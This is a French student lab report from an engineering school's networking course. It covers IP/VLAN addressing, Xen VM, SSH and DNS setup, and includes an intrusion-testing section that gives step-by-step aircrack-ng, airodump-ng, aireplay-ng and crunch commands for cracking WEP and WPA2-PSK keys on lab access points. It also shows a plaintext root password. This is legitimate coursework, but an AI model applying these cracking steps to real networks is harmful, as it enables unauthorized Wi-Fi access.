De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
[En cours]&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'access point connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi :&lt;br /&gt;
Source : https://www.cisco.com/en/US/docs/routers/access/800/850/software/configuration/guide/wireless.html&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en route (mdp : Cisco si par défaut)&lt;br /&gt;
 int sh =&amp;gt; pour trouver le nom de l'interface radio principale&lt;br /&gt;
 conf t =&amp;gt; Passer en mode configuration&lt;br /&gt;
 int dot11radio0 =&amp;gt; On se place sur la première interface radio de l'AP&lt;br /&gt;
 broadcast-key vlan 42 change 45&lt;br /&gt;
 broadcast-key vlan 1 change 45 =&amp;gt; Rafraichissement de la clé d'encryption toutes les 45 secondes &lt;br /&gt;
 ssid e304 =&amp;gt; Condiguration du SSID&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=57054</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=57054"/>
				<updated>2021-12-13T17:02:33Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
Configuration du SSH &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
Configuration du DNS :&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.site&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  193.48.57.0/24 ;&lt;br /&gt;
};&lt;br /&gt;
zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
        //allow-transfer {; };&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
@       IN      SOA     ns1.paixdieu.site. postmaster.paixdieu.site. (&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns1.paixdieu.site.&lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns1     IN      A       193.48.57.177&lt;br /&gt;
www     IN      A       193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Pour tester le bon fonctionnement du serveur DNS, nous utilisons la commande :&lt;br /&gt;
&lt;br /&gt;
&amp;gt;host -t any paixdieu.site localhost&lt;br /&gt;
&lt;br /&gt;
Résultat, cela fonctionne bien :&lt;br /&gt;
&lt;br /&gt;
Using domain server:&lt;br /&gt;
Name: localhost&lt;br /&gt;
Address: 127.0.0.1#53&lt;br /&gt;
Aliases: &lt;br /&gt;
paixdieu.site has SOA record ns1.paixdieu.site. postmaster.paixdieu.site. 4 604800 86400 2419200 604800&lt;br /&gt;
paixdieu.site name server ns6.gandi.net.&lt;br /&gt;
paixdieu.site name server ns1.paixdieu.site.&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
